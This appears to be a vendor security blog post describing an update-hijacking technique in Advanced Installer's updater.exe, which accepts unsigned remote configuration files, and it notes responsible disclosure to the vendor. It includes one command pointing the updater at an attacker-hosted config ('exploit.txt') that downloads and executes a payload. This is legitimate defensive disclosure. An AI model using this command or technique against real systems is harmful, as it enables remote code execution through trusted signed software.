The Howler Cell team has identified a recurring weakness in how Windows applications handle software updates. This technique, which we call Bring Your Own Updates (BYOU), allows attackers to hijack trusted updaters to execute arbitrary code quietly after gaining initial access. Because the binaries are signed, the paths are trusted, and the behavior appears normal; this abuse often evades traditional security controls.
This blog demonstrates how Advanced Installer, an application and deployment tool used by many of the largest organizations in the world, can be leveraged to infect remote computers with malware, potentially leading to a devastating supply-chain attack.
This blog describes an attack pathway impacting Advanced Installer v22.7 (released May 2025) update mechanism to execute arbitrary code execution.
Advanced Installer is an application packaging and deployment tool used to create installation packages (MSI, EXE, MSIX, APPX) for software products. It provides a graphical interface that simplifies building installers without requiring deep knowledge of Windows Installer (MSI) technology. Developers use it to bundle application files, dependencies, registry entries, services, drivers, and configuration settings into a single installer that can be easily deployed and managed across systems. Advanced Installer is used by many of the largest corporations in the world.
Advanced Installer’s customer page shows Apple, Microsoft, Motorola, and many other major organizations, shown in Figure 1, as customers. Organizations that do not use digitally signed updates remain exposed to this type of attack. We cannot confirm which ones fall into this category, but individual testing has demonstrated that the lack of digital signatures is a common practice.
The enforcement of digital signatures for updates is not mandatory when building installers with Advanced Installer. By default, the updater accepts unsigned packages, creating a direct exploitation path.
Real-World Scenario
Any internal enterprise software built with Advanced Installer inherits this weakness if it is not digitally signed. As the customer list below demonstrates, this is a massive list of potential companies.
Prevalence?
No exact ratio, verifying every vendor’s config is tedious. But defaults win: since signature enforcement is opt-in, most non-hardened deployments are exposed. The fact that Advanced Installer’s own setup skips this mitigation speaks volumes.
Bottom Line: This is a systemic supply chain misconfiguration, not a niche bug. We Recommend auditing all Advanced Installer built updaters and enforcing signed packages in the publication.
Figure 1 Advanced Installer Customers
This technique allows arbitrary code execution under the context of the user running the updater. It does not require prior authentication or elevated privileges to trigger. It can be leveraged in post-exploitation scenarios by an insider or threat actor with initial access to:
Software packages built by Advanced Installer without enforcing digital signature checks will be indirectly exposed to this risk.
The clear concern with this attack is that it could be a vector for a massive supply chain disruption. A supply-chain attack occurs when adversaries compromise a trusted vendor or service—such as a software provider, hardware manufacturer, or cloud platform—to infiltrate their customers. Instead of targeting each organization directly, attackers inject malicious code or components into legitimate updates or products, spreading the compromise widely and stealthily.
These attacks are especially dangerous because they exploit trust and scale: a single poisoned update from a widely used tool (for example, an installer or build tool like Advanced Installer) can silently distribute signed, trusted malware to countless global companies, causing broad data theft, operational outages, regulatory penalties, and severe reputational damage across many sectors.
This malicious technique is achieved via an attacker-controlled update configuration file. The updater binary (updater.exe) accepts remote configuration files without authentication or validation, allowing an attacker to supply a crafted updater config file that includes a reference to a malicious payload. Once the payload is confirmed via the UI, it is downloaded and executed on the target system.
The updater tool (updater.exe) in Advanced Installer accepts a -url parameter that specifies the location of an update configuration file. If this file is hosted remotely and contains valid fields such as payload URL, file size, and checksum, updater.exe will process it.
By crafting a malicious configuration file that references a remote executable payload, an attacker can:
updater.exe /checknow -url http://192.168.1.2/exploit.txt
Figure 2 Updater config example (exploit.txt)
We responsibly disclosed this issue to Advanced Installer. Their team responded promptly and informed us that if signed update channels are used, the issue cannot be exploited. However, at the time of our testing, Advanced Installer’s setup was prone to this exploitation technique, and any software not using signed update channels remains affected.